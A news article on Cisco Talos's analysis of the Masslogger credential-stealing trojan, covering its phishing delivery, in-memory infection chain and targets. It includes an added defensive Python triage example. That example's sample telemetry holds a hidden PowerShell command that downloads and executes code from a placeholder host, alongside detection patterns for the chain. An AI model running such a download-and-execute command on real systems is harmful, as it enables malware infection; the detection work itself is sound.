
Cred-stealing trojan harvests logins from Chromium browsers, Outlook and more, warns Cisco Talos

Masslogger evolution rears its ugly head, $30 gets you a three-month licence to cause carnage


Cisco Talos has uncovered a credential-stealing trojan that lifts your login details from the Chrome browser, Microsoft's Outlook and instant messengers.

Delivered through phishing emails, the Masslogger trojan’s latest variant is contained within a multi-volume RAR archive using the .chm file format and .r00 extensions, said Switchzilla’s security research arm.

“CHM is a compiled HTML file that contains an embedded HTML file with JavaScript code to start the active infection process. Every stage of the infection is obfuscated to avoid detection using simple signatures,” it said.

Opening the “help” file deploys the malware onto the target system.

Cisco Talos added: “Masslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP protocols. For the first two, no additional server-side components are required, while the exfiltration over HTTP is done through the Masslogger control panel web application.”

Apps vulnerable to these dastardly cred-stealing doings include Discord, Microsoft Outlook, Mozilla Thunderbird, Firefox and Chromium-based browsers. The malware also tries to exclude itself from Windows Defender scans.

The second stage of the infection is a PowerShell script (a common technique) that fetches the main Masslogger loader from compromised legitimate hosts, where it is stored under a .jpg file name. From there the loader is deployed and executed.
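The infection chain described above (a multi-volume RAR part carrying a .chm, then PowerShell pulling a loader disguised as a .jpg) lends itself to two simple triage rules. The following is an added example of my own, not code from Cisco Talos or from the article; it runs over constructed attachment records and process-creation events, and it assumes the mail gateway exposes the inner file names of an archive and that process telemetry records the image name and command line in the simple `key=value` form used here.

```python
import re

# Constructed sample telemetry (invented for this example, not from the Talos write-up):
# mail attachment records with the archive listing, and Windows process-creation events.
ATTACHMENTS = [
    {"msg_id": "m1", "filename": "Invoice_0221.r00", "inner_names": ["Invoice_0221.chm"]},
    {"msg_id": "m2", "filename": "report.pdf", "inner_names": []},
    {"msg_id": "m3", "filename": "photos.r00", "inner_names": ["a.jpg", "b.jpg"]},
]

PROCESS_EVENTS = [
    "image=powershell.exe cmdline=powershell -w hidden -c IEX((New-Object Net.WebClient)"
    ".DownloadString('http://compromised.example/img/logo.jpg'))",
    "image=powershell.exe cmdline=powershell -File C:\\scripts\\backup.ps1",
    "image=winword.exe cmdline=winword /n",
]

RAR_VOLUME = re.compile(r"\.r\d{2}$", re.IGNORECASE)          # .r00, .r01, ... split-archive parts
IMAGE_URL = re.compile(r"https?://\S+?\.(?:jpe?g|png|gif)\b", re.IGNORECASE)


def suspicious_archive(att: dict) -> bool:
    """Flag a multi-volume RAR part (.rNN) that carries a compiled HTML Help (.chm) file."""
    if not RAR_VOLUME.search(att["filename"]):
        return False
    return any(name.lower().endswith(".chm") for name in att["inner_names"])


def suspicious_powershell(event: str) -> bool:
    """Flag PowerShell whose command line fetches a remote 'image' URL.

    A loader parked on a compromised site under a .jpg name still has to be
    pulled by the script, so the URL in the command line is the observable.
    """
    image = re.search(r"image=(\S+)", event)
    cmdline = re.search(r"cmdline=(.*)$", event)
    if not image or not cmdline:
        return False
    if image.group(1).lower() != "powershell.exe":
        return False
    return IMAGE_URL.search(cmdline.group(1)) is not None


def triage(attachments: list, events: list) -> dict:
    """Return the message ids and event indexes that match either rule."""
    return {
        "archives": [a["msg_id"] for a in attachments if suspicious_archive(a)],
        "processes": [i for i, e in enumerate(events) if suspicious_powershell(e)],
    }


if __name__ == "__main__":
    print(triage(ATTACHMENTS, PROCESS_EVENTS))  # {'archives': ['m1'], 'processes': [0]}
```

Both rules are heuristics rather than signatures: a split archive with a .chm inside is rare enough in business mail to quarantine for review, while PowerShell downloading something with an image extension will occasionally be legitimate and is better treated as an alert to correlate with the parent process and the destination host than as a block.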

Talos said the malicious folk behind Masslogger were mostly targeting southern and eastern European countries: “Based on the combination of discovered emails and file names, we believe it was targeting organizations in Turkey, Latvia and Italy. We have observed similar campaigns happening in several instances before, starting no later than September 2020. In previous campaigns, the actor was targeting users in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain.”

Masslogger is not an entirely new creation of the malware industry: Talos pointed to previous research by infosec chap Fred HK. He attributed it to a malware underground persona who goes by the handle of NYANxCAT. Prices for Masslogger were apparently $30 for three months or $50 for a lifetime licence.

Cisco’s analysis showed that Masslogger “is almost entirely executed and present only in memory”, with only the email attachment and the HTML help file touching disk.

In-memory malware emerged in the early-to-mid 2000s. Its unique selling point for criminals is that the malware is wiped from a target system on reboot. Recently the technique has been deployed against Linux and Apple operating systems. ®
